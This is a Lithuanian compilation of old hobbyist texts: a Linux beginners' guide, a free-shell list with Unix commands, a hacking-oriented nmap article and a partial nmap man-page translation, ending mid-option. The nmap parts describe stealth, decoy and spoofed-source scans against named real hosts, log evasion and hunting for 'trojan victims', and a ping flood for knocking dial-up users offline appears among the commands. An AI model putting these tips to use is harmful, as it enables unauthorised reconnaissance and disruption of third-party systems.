2. Kodel atsirado Linux?=-
3. Linux instaliavimas
4. Linux komandos
5. Linux konfiguravimas
6. Kas yra Xwindows?

1. Kas yra Linux?

Linux yra Unix tipo operacine sistema, skirta tinklo kompiuteriams (aisku gali buti ir ne tinklo kompiuteriuose). Linux yra registruotas prekinis zenklas Linus’o Torvalds’o (Linus Torvalds) operacines sistemos, kurios branduoli jis (su draugais) parase 1991 metais. Linux daugiaprogramine (multitasking) ir daugiavartotojine sistema. Kiekvienas vartotojas turi atskiras teises. Linux yra gan saugi OS. Linux yra pirmoji operacine sistema parasyta uz JAV ribu.

2. Kodel atsirado Linux?

Seniau Unix tipo operacines sistemos buvo gan brangios ir buvo sunku gauti jos pradinius kodus arba nebuvo ju galima keist. Tad vienas studentas suomis, Linus Torvalds sugalvojo parasyti savo operacines sistemos branduoli, kuris butu
laisvai platinamas, butu galima keisti jo pradinius kodus ir t.t. Tad X-o desimtmecio pradzioje pasaulis isvydo nauja OS, kurios branduoli sudare 10 000 Linus`o parasytu C kalbos eiluciu. Kiekvienas galejo laisvai gauti sio branduolio koda, kiekvienas galejo ji tobulinti, taisyti klaidas. Ir stai- greitai Linux populiarumas pradejo augti. Vis dazniau ji imta naudoti serveriuose. Daugelis programuotoju ja tobulina. Beje, visa tai jie daro dykai, savo ir kitu labui.

3. Linux instaliavimas

Patarimas: jei jus norit tureti be Linux savo kompiuteryje ir windows- pirmiau instaliuokite windows (nepamirskit palikti atskira skirsni Linux), o poto Linux.
Visu pirma norint instaliuoti Linux, reikia apsispresti kokia Linux distribucija instaliuosite. Ju yra daugelis: Debian, RedHat, Open Linux, Mandrake, SlackWare ir kt. Jos skiriasi savo programu paketais ir siektiek savo konfiguravimu. RedHat dazniausiai naudojama pradedanciuju, nes joje yra rpm- greitas, patogus programu instaliavimo budas.
Apsisprendus kokia distribucija naudosit reikia is Linux CD pasidaryti pakrovimo diskeli (dazniausiai su programa rawrite.exe).
Instaliavimas pradedamas uzkrovus kompiuteri is to diskelio. Tada reikia nurodyti is is kur instaliuosite (kieto disko, tinklo, cdrom), kokia kalba naudosite, kokia klavetura turite ir pan.
Linux`ui skirtingai nei MS-DOS, windows reikia ne vienos particijos, o maziausiai dvieju: root particijos ir swap particijos. root particijoj laikomas Linux branduolys ir kiti jam reikialingi failai. swap particija naudojama laikiniems failams kuriti, taip kaip windows`u swap failas. Swap particija geriausiai kutri dvigubai didesni nei jusu RAM kiekis. Tada kompiuteris gales vykdyti programas kurioms reikia daugiau atminties negu jusu RAM. Jei jus instaliuosite Linux tik i sias dvi particijas jusu sistema bus tarsi skardineje. Norint kad taip nebutu reikia sukurti daugiau particiju: /home, /tmp, /usr. /home particijoj saugomi visi vartotoju failai, tad jo dydis priklauso nuo vartotoju skaiciaus ir ju poreikiu. /tmp particija panaciai kaip ir swap particija laiko laikinus failus. Skirtumas tas kad tmp particijoje laikomi paciu
programu laikini failai, o ne branduolio (kernel). /usr particijoje saugoma visos nesistemines programos, bei kiri joms skirti failai. /usr particijos dydis priklauso nuo vartotoju reikalingu programu, bet is patirties zinau kuo daugiau skirsite siam skirsnui vietos tuo geriau.
Beje, patarimas: Is karto apgalvokite ko jus norite, kiek viskas gali uzimti ir t.t., nes:
1.jei skirsnis (ypac /tmp) koks prisikemsa tai tada linux`as veikia kaip ant 386.(dazniausiai isvis luzhta)
2. Persigalvojus nera jau taip lengva perskirstyri diska. Jei vienam skirsni pritruko vietos, o kitam jos yra, nubus lengva is vieno
skirsnio vieta perduoti kitam.
Mano disko suskirstymas atrode taip:
/ 150 MB – slesas reiskia root particija.
/tmp 100 MB – tmp particija
100 MB – swap particija neturi mount point`o (pavadinimo pvz. /; /tmp ir t.t).
/home 300 MB – vartotojams skiriau 300 MB (turint omeni, kad ju bus tik du).
/usr 3 GB- skyriau visa likusia disko vieta, nes zinau kad xwindows ryja vieta, o jei noresiu dar ir StarOffice.
Beje, visi skirsniai turi buti Linux Native failu sistemos, tik swap turi buti Linux Swap failu sistemos.
Suskircius diska lieka tik menkniekiai: nurodyti kuriuos paketus instaliuoti, nurodyti tam tikra savo hardware bei jos parametrus
bei ivesti galiausiai root slaptazodi.
Is viso sito dar reiktu isskirti lilo konfiguravima. LILO (linux loader) yra programa kuri pasileidzia pries os uzkrovima ir pati uzkrauna
linux, dos ar kita OS. Jei jusu Linux root skirsnis yra daugiau negu 500 MB nuo disko pradzios LILO (naujoms LILO versijoms giliai nusisivilpt tas 1024-as cilindras-dek kur nori) turite deti i MBR (master boot record), kitais atvejais galite deti kitur. Beto galite nurodyti kokia OS krauti pagal nutylejima, kokios bus OS zymes (Linux pagal nutylejima buna “linux”, windows- “dos”). Taigi jus jau Linux instaliavote i savo kompiuteri. Kaip ji pakrauti? Kai ijungiate kompiuteri isvystate kazka panasaus i:
LILO:
Ten surenkate norimos OS zyme ir spaudziate enter. Jei zymiu nezinot ar nepamenas paspauskoit tab ir jas isvysit.

4. Linux komandos

Is pirmo zvilgsnio Linux konsole yra tas pats kas ir DOS. Bet is tikro jos labai skiriasi. Konsoleje galime daryti visa
ta pati ka ir DOS bei daug daug daugiau: kurti gerus sistemos scenarijus (skriptus), konfiguruoti Linux etc.
Cia pateikiu keleta Linux komandu be kuriu darbas su Linux negalimas:
cd (change directory)- pakeiskti aktyvu kataloga, dos analogas cd.
(atminkit kad Linux yra skirtumas tarp didziuju ir mazuju raidziu)
pwd (print working directory)- parodo aktyvu kataloga.
ls- isveda aktyvaus katalogo failu ir katalogu sarasa.
rm- istrina kataloga.
chsh (change shell)- keitce user`io shell
passwd – pakeicia userio slaptavardi
man (manual)- parodo komandos ar ko kitko aprasyma (manual).
linuxconf – linux sistemos konfiguravimas. [ne komanda, o programa, kitur gali nebut]
setup- linux paketu konfiguravimas, laiko, peles, garso kortos nustamas it t.t.

Kiti dalykai kurie pravers: ~ (tilde) – resikai jusu home kataloga. Tad jei norite gristi i savo home kataloga galite rasyti
cd /home/tavo_useris/ arba cd ~. Na o jei rasysite cd ~user, tai jus busite perkeltas i user userio kataloga.

5. Linux konfiguravimas

Zinot Linux programuotoju posaki: “Kam programuoti jeigu galima konfiguruoti?”. Taigi Linux daug ka reikia atlikti paciam. Visi Linux konfiguraciniai failai yra /etc kataloge arba jusu home kataloge. Tu failu yra daugelis, tad as paminesiu tik keleta:
/etc/passwd – saugo informacija apie Linux vartotojus, ju home katalogus, shell`a ir kt.
/etc/shadow – saugo uzkuodotus vartotoju slaptazodzius.
.bachrc, .bashprofile – bash (Bourne Again SHell) shell`o konfiguraciniai failai.
Kaip konfiguruoti Linux placiau suziosite skaitydami how-to arba manual.

6. Kas yra xwindow?

xwindow yra grafinis linux apvalkalas (X Window linuxistai vadina XFree86, o tikrasis X Windows yra skirtas UNIXUI ir kitiems
pobrangiem *IX’ams, jis juk ne nemokamas ), kuris leidzia dirbti su Linux vizualiomis priemonemis. X Window System, sutrumpintai vadinama X Window arba tiesiog X, yra paremta kliento/serverio architektura. X serveris – grafikos, klaviaturos bei peles draiveriu visuma, leidzianti kelioms programoms (X klientams) rodyti bet ka atskiruose, gal but persidengianciuose languose. Pavyzdiai: XFree86 serveriai (XF86_SVGA, XF86_S3 ir t.t.), Metro X, Accelerated X. Visi X klientai yra lygus, bet vienas is ju lygesnis uz kitus. Jis vadinasi window manageriais. Window managerio paskirtis – duoti kiekvienam langui remeli su pavadinimu, pora arba kelias desimtis mygtuku (uzdarymo, padidinimo ir t.t.), jis pirmas apdoroja klaviaturos bei peles paspaudimus ir leidzia langus nesioti, didinti, iskelti i prieki, aktyvuoti ir taip toliau. Pavyzdiai: Enlightenment, kwm (i KDE), fvwm, Window Maker etc. Toliau lieka tik vartotojo programos. Jos, zinoma, galetu pacios keistis su X serveriu zemo lygio komandomis, bet daug
paprasciau naudoti pilnavertes bibliotekas. Sios biliotekos suteikiaivairiu standartiniu irankiu (vadinamu ‘widget’) – mygtuku, scrollbaru ir t.t. Pavydziai: Xaw (Athena Widget Set), Xaw3d, Motif, Gtk+, Qt. Galu gale beliko desktopai. Desktopo paskirtis – suteikti ivairioms programoms vienoda isvaizda ir naudojima (‘look and feel’). Paprastai desktopa sudaro biblioteka, window manageris ir kruvele bendros paskirties programu (paleidimo panele, failu tvarkykle ir t.t.). Pavyzdiai: CDE, KDE, Gnome.

Galvojo ir bade si teksta SaTaN, koregavo LivDea.

34. UNIX Naujokams

By Craft[Eye] www.underground.lt CraftEye@gmx.net

TAIGI FREE SHELLS(kai kuriu yra puslapiai, kai kuriems rashote newuser
shelle prisijunge su telnet per 23 porta):

havoc.net – Niekas IRC botu neleis det.

pooki.smartec.com – Truputi letas.

nether.net – Labai gerai zhinomas. Taip pat labai uzhbaigtas,
su juo gausite 3 megabaitus vietos. Telnete surinkite newuser.

nyx.net Turesi nusiusti maila tam, kad uzhsiregistruotum.
Negausi daug vietos diske.

suburbia.net Sysadminai parashe tinklo skaneri – ‘Strobe’.

cyberspace.org Originalus shellas – pradedantiesiems bus grazhus
menu.

Ashpool.com Hmm shellas. =]

Arbornet.org Meshlas

TakiWeb.com Dar vienas shellas.

Kai kurios UNIX komandos ir trumpas aprashymas.

alias – leidzhia vartotojui pamatyti esamus aliasus
bdiff – sujungia du didelius failus
bfs – skanuoja dideli faila
cal – parodo kalendoriu
cat – parodo failo turini
cc – c programavimo kalbos kompiliatorius
cd – keicia direktorija
chgrb – keicia failo priklausomybe grupei
chmod – keicia failo atributus
chown – keicia failo priklausomybe useriui
cmp – palygina du failus
comm – sujungia du failus taip kad vienodos eilutes butu pashalinamos
cp – kopijuoja faila i kita vieta
cu – iskviecia kita unix sistema
date – parodo tikslu laika ir data
df – parodo visus prijungtus irenginius tavo mashinoje
diff – ishspauzdina dvieju failu skirtumus
du – parodo direktorijos ishnaudojima vieta blokais
echo – ishveda teksto eilute
ed – paprastas tekso redaktorius
env – nustato aplinkos kintamuosius
ex – tiesiog kitas teksto redaktorius
expr – apsluates a mathmatical formula
find – randa faila
f77 – fortrano programavimo kalbos kompiliatorius
format – paruoshia diskeli
grep – ieshko duomenu tekste
help – parodo pagalba
kill – sustabdo veikianti processa
ln – sukuria nuoroda tarp dvieju failu
lpr – kopijuoja faila i paralelini printeri
ls – parodo visus failus ir katalogus esanchius direktorijoje
mail – leidzhia vartotojui siusti/gauti pashta
mkdir – sukuria direktorija
more – ishveda duomeu faila i ekrana
mv – naudojamas tam, kad pervardintu ar perkeltu direktorijas
nohup – leidzhia komandai veikti net tada kai tu isheini ish shello
nroff – naudojamas tam, kad formatuoti teksta
passwd – pakeichia tavo passworda
pkgadd – instaliuoja nauja programa tavo mashinoje
ps – parodo shiuo metu dirbanchius procesus
pwd – parodo aktyvia direktorija kurioje tu dirbi
rm – trina nurodyta faila
rmdir – trina nurodyta direktorija
set – parodo visu kintamuju esanchiu shell’e vardus
setenv – nustato aplinkos kintamuosiu
sleep – padaro veikenti procesa neaktyvu
source – leidzhi paleisti faila ir pakeisti bet kurias pasikeitusias
reikshmes faile
sort – surushiuoja failus
spell – ieshko rashybos klaidu norodytame faile
split – padalina faila
stty – nustato terminalo parametrus
tail – ishspauzdina failo gala
tar – nukopijuoja visus nurodytus failus i viena
touch – sukuria nauja tuschia faila arba nustato laika/data failui
troff – ishveda suformatuota ishvesti =]
tset – nustato terminalo tipa
umask – nurodo nauja sukurimo mask’a
uniq – palygina du failus
uucp – unix i unix paleidimas
vi – editorius per visa ekrana
vipw – atidaro vi editoriu taip kaip password fiaila redagavimui
volcheck – patikrina ar yra prijungtas diskelis prie tavo mashinos
wc – skaichiuoja failo, zhodzhius, eilutes ir t.t.
who – informacija apie kita zhmogu online
write – nusiunchia zhinute kitam vartotojui
sleep – nieko nedaro tam tikra laiko tarpa
logname – parodo logo varda
dd – vygdo keitimus kopijuojant
du – parodo kiek vietos sunaudota
mount – montuoja failines sistemas
cut – ishtraukia pasirinktas failu dalis
fold – perkelia ilgas eilutes
join – apjungia eilutes ish skirtingu failu
od – dvejetainis dampas
paste – apjungia failu eilutes
pr – skaido failus i puslapius
sort – rushiuoja duomenis failuose
strings – ishgauna teksta ish failo
sum – skaichioja galutine kotroline suma
tr – keichia simbolius
basename – ishgauna failo varda ish pilno kelio
dirname – ishgauna direktorijos varda ish pilno kelio
false – grazhina reikshme false(nedaro nieko 🙂
true – grazhina reikshme true(nedaro nieko 🙂
groups – ishveda duomenis apie vartotoju priklausomybe grupems
hostname – parodo tikslius duomenis apie vartotoja
nice – nustato esamo proceso prioriteta
pathchk – patikrina kelius
printenv – ishveda aplinkos kintamuosius
stty – parodo arba pakeichia terminalo parametrus
su – ledzhi tapti kitu vartotoju
tee – sukuria keleta ishvedimo kanalu
test – patikrina faila ir simboliu eilute
tty – ishveda terminalo pavadinima
uname – ishveda duomenis apie operacine sistema ir pan.
users – parodo dabar esanchius vartotojus prisijungusius prie sistemos
who – pasako kokie vartotojai uzhregistruti ir t.t.
whoami – parodo kas per vienas(velnias;) tu esi
man – parodo pagalba apie, bet kuria komanda – dazhniausiai naujoku
naudojama
komanda =]
! – pakartoja komandas
——————————————————————————
Network komandos:

telnet – telnetas tavo shelle
who – parodo kas yra prisijunges prie LAN
netstat – prisijungimu statistikos
finger – informacija apie tinklo vartotojus
ping – skirta tikrinti ar yra ryshys su tam tikra mashina(daugelis
naudoja ja kokiams nors serveriui pakabinti ar ishmesti ish dial-up,
jei greitas ryshys tai suvede komanda ping -c 50000 127.0.0.1 tikriausiai
dial-up niekada neatlaikys =)
ftp – leidzhia parsisiusti/siusti failus
whois – informacija apie interneto mazgus
nslookup – more informacija apie interneto mazgus
dig – tas pats kas ir nslookup tik dar daugiau, jei panaudosite
tinkamus raktus galite ishtraukti neblogos informacijos

—————-End Of Commands List

Na zhodzhiu dabar jau palieku ash jus vienus ir darykit ka jus norit
su tuo UNIX – svarbiausia darykit.

Na shiam kartui tiek..

Craft[Eye] : UNIX rulezz if you rule UNIX =]
EOF
General Protection Fault.. Kernel Panic.

35. Nmap’o panaudojimas hack’o tikslais

1.Info
Jei rimčiau susidomėsite darbu su nmap’u, tuomet būtinai apsilankykite siame saite:
http://www.insecure.org/nmap.

2.Kas yra nmap’as ?

Nmap’as tai tinklo skenavimo programa.Jo pagalba jūs galite tikrinti savo, bei kitų
tinklų saugumą.Tiksliau jūs galite skanuoti portus, bei suzinoti ar juos dengia koks
nors firewall’as.Taip pat galima su nmap’u galima nustatyti kito kompiuterio operacinę
sistemą, tereikia tik ip adreso ir aišku interneto ryšio.

3.Trūkumai ir bugai

Daugumą šiame dokumente aprašytas funkcijas galima atlikti tik iš root’o.Tai
galima sakyti yra pats didžiausias šios programos trūkumas ar bugas.

4.Pradedam

Dokumentas parašytas pagal 2.3BETA14 versiją.
Primiausia reikia atsisiūsti šia programą.O poto atlikti šiuos veiksmus:

# cp nmap-2.3BETA14.tar.gz /usr/local/src
# cd /usr/local/src/
# gunzip nmap-2.3BETA14.tar.gz
# tar -xvf nmap-2.3BETA14.tar
# rm nmap-2.3BETA14.tar
# cd nmap-2.3BETA14/
# more INSTALL
# ./configure && make && make install
# rm -rf nmap-2.3BETA14/

Lets go !

5.Komandų sintaksė yra tokia

# nmap [skanavimo tipas(ai)] [opcijos]

5.1. Skanavimo tipai

Manau šis tipas hackeriams beveik nereikalingas.Nmap’as jungiasi prie kiekvieno
-sT porto iš eilės.Todel viskas loginama loguose ir tave tikrai suseks.Šis būdas yra tiksliausias

bet ir pavojingiausias.TCP connect skanavimas.

Šis būdas jau saugesnis tačiau ne visada , pvz jei stovi firewall’as.Skanuojant tokiu būdu
-sS nėra padaromas TCP prisijungimas, o paprasciausiai nusiunciamas TCP SYN paketas kaip norint

prisijungti ir laukiama atsakymo.TCP SYN skanavimas.

-sF, -sX, -sN

Tai saugesnis už TCP SYN skanavima bet turi vieną labai rimtą trūkumą.Nei vienas iš jų neveikia

Microsoft sistemoms.Stealth FIN, Xmas Tree bei Null skanavimo režimai.

-sU UDP portų skanavimas, beprasmiškas naujoms sistemoms.Ir trunka labai ilgai.

5.2 Bendrosios opcijos ( Štai ir pats smagumas prasideda)

-P0 Skanuoja išarto nebandęs prieš tai pinginti hosto.Reikalingas tokiems servams kurie neatsakinėja

į ICMP echo request’us ( pvz. pop.takas.lt)

-O Zjbiškiausia nmap’o funkcija.Atpažįsta kompo OS pagal jo fingerprint’us.

-oN

Viską kas vyksta ekrane logina i nurodytą failą.

-iR Dar viena labai cool nmap’o funkcija.Pats nmap’as generuoja bet kokius ip adresus ir

skanuoja nurodytus portus.Jei ieškote kokiu trojanų auku tiesiog rašykite

nmap -sS -iR -p 1234(portas) 127.0.0.1.

-p

Galite nurodyti kuriuos ar kurį portą tikrinti.
-p 21,60-90,1243 — 21, visi nuo 60 iki 90 bei 1243 port

-D

Decoy skanavimas priverčia skanuojamą host’ą manyti, kad jį vienu

metu skanuoja visi nurodyti decoy’iai. Hostų logai gali parodyti

5-10 skanavimų is unikalių IP adresų, bet kuris iš jų skanuoja

iš tikro jie pasakyti negalės.

Reikia atskirti vien1 decoy nuo kito kableliais be tarpo, tarp jų gali

įrasšyti ME, tai bus tavo IP adresas.Jei neįrašysi ME, tai nmap’as parinks

vietą tavo IP pats.

Tik reikia prisiminti, kad decoy įrašyti hostai turi būti gyvi, kitaip

gali uz-SYN-flood’inti taikinį.Beto labai nesunku bus surasti tave, jei tik

tavo IP bus gyvas iš visų decoy’ų.

Reikia pasakyti kad kai kurie portų skanavimo detektoriai gali išviso uždrausti priėjimą

skanuojantiems hostams.Todėl būtų linksma jei kartą nurodytumėt vieną iš decoy’ų pvz. 127.0.0.1

Decoy gali būti naudojamas kartu su ping, tikru portų skanavimu ar su OS nustatymu (-O).

-S

Kartais nmap’as gali nerasti jūsų adreso.Tokiu atveju galima naudoti -S funkciją su jūsų IP ir

interfeisu kuriuo norite siūsti paketus.

Tokiu būdu galite nurodyti kieno nors kito ip adresą ir isdurti taikinį,

-e Interfeisas

Pvz. eth0, lo, ppp0 ir kt.

-g Nurodo is kokio porto skanuoti.

-T

Paranoid pats lečiausias skanavimo būdas, bet ir tiksliausias, Insane pats greičiausias, tačiau

ne toks tikslus.

5.3.Pavyzdžiai

# nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Xmas Tree būdu aš skanuoju savo localhost’ą apsimesdamas 127.0.0.3.Loopback interfeisu.Va ką
rodo ipchains’ų logas:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009 127.0.0.1:139
L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

Kernelis įsitiknęs kad jį skanuoja 127.0.0.3.

# nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/mad -p 1-1024 -O mad.com

Null skanavimo režimu , panadodamas du decoy adresus, viską logina į /tmp/mad failą.Skanuoja
nuo 1-1024 portus ir bando atspėti OS mad.com serverio.

6.Pabaigai

Na pvyzdžių man atrodo daug nereikia jei turite lakią fantaziją jų prisigalvosite patys.

Wrote by Z-Man (z-man@scientist.com)

Nmap network security scanner man page (Lithuanian translation)

36. NMAP (2)

PAVADINIMAS

nmap – tinklo tyrinėjimo įrankis bei saugumo skeneris

SINTAKSĖ

nmap [skanavimo tipas(ai)] [opcijos]

APIBŪDINIMAS

nmap’as yra sukurtas tam, kad leistų sistemų administrato­

riams bei smalsiems individams skanuoti didelius tinklus,

siekiant nustatyti kokie hostai yra veikiantys ir kokias

paslaugas jie siūlo. nmap’as turi be galo daug skanavimo

technologijų, tai: UDP, TCP connect(), TCP SYN (pusiau

atviras), ftp proxy (bounce ataka), Reverse-ident,

ICMP(ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep,

bei Null skan’as. Skanavimo Tipai sekcijoje rasite apie

tai smulkesnės informacijos. nmap’as taip pat turi

nemažai pažangių savybių, tokių kaip nutolusio kompiuterio

(toliau vadinamo ‘remote’) (O)peracinės (S)istemos nus­

tatymas per TCP/IP fingerprintinima, stealth (vogtinis)

skanavimas, dinaminės pauzės ir retransimisijos skaičiavi­

mai, lygiagretusis skanavimas , nepasiekiamų host’ų nus­

tatymas skanuojant lygiagrečiu skanavimo metodu, decoy

skanavimas, filtruojamų portų nustatymas, tiesioginis RPC

skanavimas, fragmentinis skanavimas, bei labai lankstus

taikinio ir portų nurodymas.

nmap’o autorius stengiasi kaip galima daugiau įvairių

nmap’o galimybių suteikti ne tik root vartotojui, bet ir

paprastam sistemos vartotojui, deja daugėlis kritinių sis­

temos branduolio (kernel) interfeisų (tokių kaip “raw

socket’ai”) reikalauja root’o privilegijų, todėl nmap’as

turėtų būti naudojamas root’u kai tik įmanoma.

nmap’o naudojimo rezultatas dažniausiai būna paprasčiau­

sias sąrašas įdomių portų, rastų skanuojamoje

mašinoje(se). Nmap’as visada parodo kokią paslaugą (ser­

vice) teikia portas, jo numerį, būseną bei protokolą.

Būsaną nusako vienas iš trijų žodžių: “open”, “filtered”,

“unfiltered”. “open” (atviras) reiškia, kad taikinys leis

prisijungti prie šito porto. “filtered” (filtruojamas)

reiškia, kad firewall’as (ugnies siena), filtras ar dar

kažkoks įdomus įrankis dengia portą, dėl to nmap’as tikl­

siai negali nustatyti ar portas atviras. “unfiltered”

(nefiltruojamas) parodo, kad portas yra tikrai “closed”

(uždarytas) ir nera dengiamas jokio firewall’o/filtro.

Nefiltruojamas portas yra gan įprastas atvėjis ir yra

rodomas tik tuo atveju, kai dauguma iš skanuotų portų yra

filtruojami.

Priklausomai nuo to, kokios opcijos naudojamos, nmap’as

taip pat gali parodyti ir nutolusio kompiuterio:

(O)peracinę (S)istemą, TCP susekamumą, vartotoju vardus,

kuriems priklauso tam tikri procesai, DNS vardus ir dar

vieną kitą.

OPCIJOS

Prasmingos opcijos visos gali būti rašomos kartu (t.y.

vienoje eilutėje). nmap’as stengsis pasakyti, kokias

klaidas esate padarę (aišku jei esate :).

Jei esate nekantrus, galite iškarto šoktelti į sekciją

pavyzdžiai gale dokumento, kur gan aiškiai parodo naudo­

jimą. Taip pat galite paleisti nmap -h ir pamatysite

pagrindines opcijas, su trumpais aprašymais.

SKANAVIMŲ TIPAI

-sT paprasčiausias TCP connect() skanavimas. Jūs ban­

dote prisijungti prie kiekvieno porto iš eilės. Jei

portas klausosi, nmap’as prisijungia prie jo, taigi

jei host’as logina, jis matys, kad bandote jungtis.

Šis metodas yra tiksliausias, bet rekomenduočiau jį

naudoti tik tuo atveju, jei skanuojate savo ar

draugo kompiuterį, t.y. tokį, dėl kurio vėliau

tikrai nesusilauksite nemalonumų.

-sS TCP SYN skanavimas, kitaip dar dažnai vadinamas

kaip “pusiau-atviras” skanavimas, nes nėra padaro­

mas TCP prisijungimas. Jūs paprasčiausiai

nusiunčiate TCP SYN paketuką kaip kad norėdamas

prisijungti ir laukiate atsakymo. Pakankamai neblo­

gas metodas, bet jei yra filtruojamų portų (pvz.

pastatytas firewall’as) ir host kompiuteris juos

logina, – būsite pastebėtas.

-sF -sX -sN

Stealth FIN, Xmas Tree bei Null skanavimo režimai.

Tai yra šiek tiek saugesni skanavimo būdai nei TCP

SYN (pastebimumo atžvilgiu), bet deja nei vienas iš

jų neveikia M$ sistemoms. Iš kitos pusės, tai

nebloga priemonė, kurios pagalba galima nustatyti

ar tai M$ sistema ar ne, t.y. jei -sF -sX arba -sN

parodo, kad visi portai uždaryti, o -sS rodo kelis

atvirus portus, taikinys greičiausiai windows

dėžutė.

-sP Tai paprasčiausias ping’as, kuris parodo kurie

hostai tinkle yra gyvi. Atliekama paprasčiausiai

siunčiant ICMP echo prašymą (request). Deja kai

kurie saitai (kaip mail.takas.lt) blokuoja

prašymus. Kad iš tikro įsitikinti, ar hostas negy­

vas, nmap’as nusiunčia ir TCP ack paketuką į 80

(standartiškai) portą. Jei gauname atgal RST,

reiškia hostas gyvas. Pagal standartą (r00t’ui)

nmap’as naudoja abu ICMP bei ACK metodus. Pakanka­

mai efektyvu, nes vienu metu galite patikrinti #n

hostų.

-sU UDP skanavimas. Naudojamas tam, kad nustatyti kokie

UDP (User Datagram Protocol, RFC 768) portai yra

atviri.

Kai kurie mano, kad UDP skanavimas yra

beprasmiškas, bet jį prisiminti verta vien dėl

vienos Solaris rcpbind skylės. Taip pat yra cDc

Back Orifice trojanas, kuris atsidaro UDP portą ant

window’sų. Gaila tik, kad UDP skanavimas kartais

gali trukti labai ilgai.

-sA ACK skanavimas: šitas metodas paprastai yra naudo­

jamas tam, kad išsiaiškinti firewall’ų (ugnies

sinų) taisykles. Jis gali padėti nustatyti ar fire­

wall’as tikras, ar paprasčiausias paketų filtras,

blokuojantis įplaukiančius SYN paketukus.

-sW Window skanavimas. Šis skanavimo būdas labai

panašus į ACK skaną, skirtumas tik tas, kad šis

skanavimo metodas kartais parodo ir atvirus portus

(ACK jų nerodo).

-sR RPC skanavimas. Praskanavus parodoma kokia programa

ir jos versija laiko RPC portus atvirus.

-b

Dar vienas pakankamai originalus skanavimo būdas,

t.y. pasinaudojant ftp proxy serveriu. formatas gali būti useris:passwor­

das@serveris:portas . Viskas išskyrus serverį yra

nebūtina.

BENDROSIOS OPCIJOS

Nei viena iš šių nėra būtina, bet kai kurios gali

būti pakankamai naudingos

-P0 Skanuoti iš kart, nepabandžius iš pradžių ping’int

serverio. Tai naudinga skanuojant tokius kaip

mail.takas.lt, kurie neatsakinėja į ICMP echo

request’us. Tokiu atveju reikėtų naudoti -P0 arba

-PT80.

-PT Naudoti TCP “ping’ą” vietoje standartinio ICMP

ping’o. Naudinga tokiais atvejais, kai serveris

neatsakinėja i ICMO echo request’us. Taip pat gal­

ima naudoti kartu su postu (-PT).

-PS Naudoja SYN (prisijungimo prašymą) vietoje ACP

-PI Paprastas ping’as + suranda subnet’o broadcast’u

adresus tinkle.

-PB Standartinis ping’inimo metodas: naudoja ACP bei

ICMP ping’us kartu. Geriausia būdas patikrinti

firewall’us, kurie blokuoja vieną iš jų.

-O Viena geriausių nmap’o ypatybių – serverio OS’o

atpažinimas pagal jo fingerprint’us (jei atvirai,

pats nelabai žinau kas per biesas tie finger­

printai).

-I Įjungiamas TCP reverse ident skanavimas. Kaip 1996

Dave’as Goldsmith’as pastebėjo, ident protokolas

(rfc 1413) leidžia pamatyti, kokiam useriui prik­

lauso procesas, kuris naudoja TCP susijungima.

Taigi, tu gali pvz prisijungti prie 80 porto ir

tada pasinaudojes inentd’u, gali pamatyti ar http

serveris yra paleistas root’u ar kokiu kitu

userium.

-f Skanuojant SYN (-sS) , FIN (-sF), XMAS (-sX) arba

NULL (-sN) metodu, naudojami labai mažyčiai sufrag­

mentuoti IP paketai.

-v Verbose mode. Labai rekomenduojama opcija, ypač jei

norit geriau suprasti kas čia dedasi. naudodamas

šią opciją du kartus, efektas bus dar geresnis.

Gali naudoti ir dvigubą -d, efektas – nerealus.

Nepabandęs, nesuprasi.

-h Jei norite kad nedidelis langelis jums trumpai

primintu kelias pagrindines komandas, ši opcija –

jums.

-oN

Viskas, kas vyksta ekrane bus loginama į “logas”

failą.

-oM

Viskas, kas vyksta ekrane bus loginama į failą

“logas” “šiek tiek” kitokiu formatu.

-oS

Logina į failą “logas” kažkokiu nauju s|

Skanavimas, kuris buvo nutrauktas su ^C, gali būti

pratęstas, su sąlyga, kad viskas buvo loginama su

-oN arba -oM opcija. Daugiau jokie parametrai

negali būti pateikti (jie bus tokie, kokie buvo

naudojami loginant). nmap’as pradės skanuoti nuo

sekančios mašinos, po tos, kuri paskutinė buvo

sėkmingai nuskanuota..

-iL

Nuskaito hostus (IP adresus) iš failo “failas”.

Hostai faile turi būti atskirti tarpais, TAB’ais

arba atskirose linijose. deja opcijų nurodyti jokių

negalite tame faile, užtat yra galimybė jas

nurodyti komandinėje eilutėje.

-iR Šita opcija priverčia nmap’ą generuoti atsitik­

tinius hostus. Jei kada neturėsite ką veikti,

pabandykite `nmap -sS -iR -p 80′, kad surastumėte

keletą www serverių.

-p

Galite nurodyti kurį/kuriuos portus tikrinti. pvz.

-p 110 patikrins ar hostas turi pop3 serverį, taip

pat galite mišriai nurodinėti portus:

-p 21,60-90,1243 — 21, visi nuo 60 iki 90

bei 1243 portas

-p 1- — visi portai nuo 1 iki

65535.

-F Greitasis metodas. Skanuoja tik tuos portus, kurie

nurodyti nmap’o services faile (pagal default’ą –

/usr/local/lib/nmap/nmap-services)

-D

Decoy skanavimas priverčia skanuojamą host’ą

manyti, kad jį vienu metu skanuoja visi nurodyti

decoy’iai. Hostų logai gali parodyti 5-10 skanavimų

iš unikalių IP adresų, bet kuris iš jų skanuoja iš

tikro jie pasakyti negalės.

Atskirk kiekvieną decoy’į kableliais (be tarpo) ir

gali tarp jų įterpti ‘ME’ kaip vieną iš decoy’ių.

nmap’as ten įterps tavo adresą. Jei šito

nenurodysi, nmap’as atsitiktinai išrinks tau vietą.

Tiesa, jei ‘ME’ įrašysi 6-oje ar dar vėlesnėje

vietoje, kai kurie skanavimų detektoriai (tokie

kaip Solar Designer’io nepakartojamas scanlog dae­

mon’as) gali tavo IP išviso neparodyti.

Nepamiršk, kad hostai, kuruos naudosi kaip

decoy’ius, turi būti gyvi, kitaip gali už-SYN-

flood’inti taikinį, o be to labai nesunku bus

surasti skanuotoją, jei jis bus vienintelis gyvas

visame tinkle.

Atkreipk dėmesį ir į tai, kad kai kurie (durnesni)

portų skanavimų detektoriai gali aplamai skanuo­

jantiems host’ams uždrausti priėjimą. Įsivaizduok,

kas gali nutikti, jei vieną iš decoy’ių nurodytum

“localhost’ą” 🙂

Decoy skanavimas gali būti naudojamas kartu su ping

(naudojant ICMP, SYN, ACK, ar dar ką nors) arba

tikru portų skanavimu bei bandant surasti remote

OS’ą ( -O ).

-S

Kartais nmap’as gali nerasti jūsų adreso. Tokiu

atveju galite naudoti -S opciją su jūsų IP adresu

bei interfeisu, kuriuo siūsite paketus.

-e

